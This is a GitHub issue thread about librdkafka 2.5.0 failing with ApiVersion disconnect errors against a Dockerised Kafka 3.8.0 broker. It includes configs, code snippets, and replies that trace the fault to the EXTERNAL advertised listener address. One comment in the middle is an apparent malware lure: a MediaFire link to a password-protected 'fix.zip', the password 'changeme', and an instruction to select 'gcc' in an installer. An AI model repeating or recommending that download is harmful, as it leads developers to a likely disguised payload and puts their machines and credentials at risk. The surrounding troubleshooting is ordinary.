librdkafka
librdkafka copied to clipboard
Error "Disconnected while requesting ApiVersion: might be caused by incorrect security.protocol configuration..." connecting to kafka broker 3.8.0
Description
I'm trying to connect to a Kafka broker with librdkafka but the producer always fails with error
%6|1724670994.540|FAIL|us-od.kafka-producer-1#producer-1| [thrd:127.0.0.1:9092/1]: 127.0.0.1:9092/1: Disconnected while requesting ApiVersion: might be caused by incorrect security.protocol configuration (connecting to a SSL listener?) or broker version is < 0.10 (see api.version.request) (after 0ms in state APIVERSION_QUERY, 3 identical error(s) suppressed)
Broker version is 3.8.0 (Docker image: bitnami/kafka, sha256:ed3c7264b110293d565cbe4ab479631f8b56196e98d19d4ab4fba689a142f176).
I run my client against librdkafka version 2.5.0, installed on an Alpine (3.19.0) Docker container. I installed librdkafka from the edge/community repository using apk add --no-cache librdkafka-dev --repository=https://dl-cdn.alpinelinux.org/alpine/edge/community. I also installed glib-dev, lz4-dev, pkgconfig, openssl-dev and all build and debug tools I need, as this is a development container.
The broker is configured with following settings:
KAFKA_BROKER_ID=1
KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CLIENT:PLAINTEXT,EXTERNAL:PLAINTEXT
KAFKA_CFG_LISTENERS=CLIENT://:9093,EXTERNAL://:9092
KAFKA_CFG_ADVERTISED_LISTENERS=CLIENT://kafka:9093,EXTERNAL://127.0.0.1:9092
KAFKA_CFG_INTER_BROKER_LISTENER_NAME=CLIENT
KAFKA_CFG_ZOOKEEPER_CONNECT=zookeeper:2181
ALLOW_PLAINTEXT_LISTENER=yes
I create the client (producer) with this:
// Configuration
rd_kafka_conf_t *kafka_conf = rd_kafka_conf_new();
// Parameters are copied from a YAML file:
// bootstrap.servers=localhost:9092
// security.protocol=PLAINTEXT
// log_level=7
// api.version.request=true
// Producer
producer = rd_kafka_new(RD_KAFKA_PRODUCER, kafka_conf, errstr, sizeof(errstr));
// Messages are sent to the queue using:
err = rd_kafka_producev(
producer,
RD_KAFKA_V_TOPIC(topic_name),
RD_KAFKA_V_MSGFLAGS(RD_KAFKA_MSG_F_COPY),
RD_KAFKA_V_VALUE((void *) message_content.c_str(), message_content.size()),
RD_KAFKA_V_OPAQUE(NULL),
RD_KAFKA_V_END);
If I use a client developed in Kotlin that makes use of a Java client, I can connect to the broker and publish or consume without issues.
It is the same for a test Python application with default settings, I can connect and send messages:
producer = KafkaProducer(bootstrap_servers="localhost:9092")
fut = producer.send(
topic="my-topic",
value=value
)
res = fut.get(timeout=10)
producer.flush()
Things noted
I captured network traffic using WireShark and found something that called my attention. The C++ client goes through a long list of metadata requests, and seems it can't go any further from that point:
The Python client, which I assume can be using a possibly outdated rdkafka library version, does not go through that long list of:
Is there any configuration I'm missing? Is there any other component I need to install for the client to be able to operate as expected?
BR, V.
Checklist
Please provide the following information:
- [x] librdkafka version (release number or git tag):
2.5.0 - [x] Apache Kafka version:
3.8.0 - [x] librdkafka client configuration:
bootstrap.servers=localhost:9092,security.protocol=PLAINTEXT,log_level=7,api.version.request=true - [x] Operating system:
Alpine (3.19.0) - [x] Provide logs (with
debug=..as necessary) from librdkafka: only log line produced is: %6|1724673649.217|FAIL|us-od.kafka-producer-1#producer-1| [thrd:127.0.0.1:9092/1]: 127.0.0.1:9092/1: Disconnected while requesting ApiVersion: might be caused by incorrect security.protocol configuration (connecting to a SSL listener?) or broker version is < 0.10 (see api.version.request) (after 0ms in state APIVERSION_QUERY, 4 identical error(s) suppressed) - [x] Provide broker log excerpts: The broker does not produce any log entry
- [x] Critical issue
Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."
Can you capture debug logs withdebug='all' in your config and provide them?
I've now tested against librdkafka 2.5.0-2, built and installed from sources, configured with --enable-zlib --enable-zstd --enable-ssl --enable-gssapi --enable-curl --disable-lz4-ext.
Config parameters are: bootstrap.servers=192.168.1.106:9092, log_level=7, debug=all, allow.auto.create.topics=true.
Logs are attached. BR log-librdkafka-1.txt
Any findings, @anchitj?
Any updates on this, @anchitj?
Hi, were you able to take look at this?
It seem that in your test calls (ApiVersions, Metadata) are succeeding when connecting to the boostrap server 192.168.1.106:9092/bootstrap but failing when connecting to the advertised listener 127.0.0.1:9092 could it check if in this test port forwarding was enabled to reach the docker container?
I've created a new compose, now the test application runs from inside the same docker application as zookeeper and Kafka. The error is different now: Disconnected while requesting ApiVersion: might be caused by incorrect security.protocol configuration (connecting to a SSL listener?) or broker version is < 0.10 (...etc...). I've attached the log. log-librdkafka-2.txt
Here below are the sections for zookeeper and Kafka.
zookeeper:
container_name: oddev_zookeeper
image: 'bitnami/zookeeper:latest'
ports:
- '12181:2181'
environment:
- ALLOW_ANONYMOUS_LOGIN=yes
networks:
- monitor
kafka:
container_name: oddev_kafka
image: 'bitnami/kafka:latest'
networks:
- monitor
ports:
- '19092:9092'
- '19093:9093'
environment:
- KAFKA_BROKER_ID=1
- KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CLIENT:PLAINTEXT,EXTERNAL:PLAINTEXT
- KAFKA_CFG_LISTENERS=CLIENT://:9093,EXTERNAL://:9092
- KAFKA_CFG_ADVERTISED_LISTENERS=CLIENT://kafka:9093,EXTERNAL://127.0.0.1:9092
- KAFKA_CFG_INTER_BROKER_LISTENER_NAME=CLIENT
- KAFKA_CFG_ZOOKEEPER_CONNECT=oddev_zookeeper:2181
- ALLOW_PLAINTEXT_LISTENER=yes
depends_on:
- zookeeper
kafka-visualizer:
container_name: oddev_kafka-visualizer
image: 'provectuslabs/kafka-ui:latest'
networks:
- monitor
ports:
- '18080:8080'
environment:
- KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS=kafka:9093
I think the problem is with the EXTERNAL advertised listener, because it has
EXTERNAL://127.0.0.1:9092 and the client is using the localhost address of the host.
Try putting the same address as in the bootstrap servers: EXTERNAL://192.168.1.106:9092 because it can connect to that one.
Also using localhost with the forwarded port 19092 should work:
EXTERNAL://localhost:19092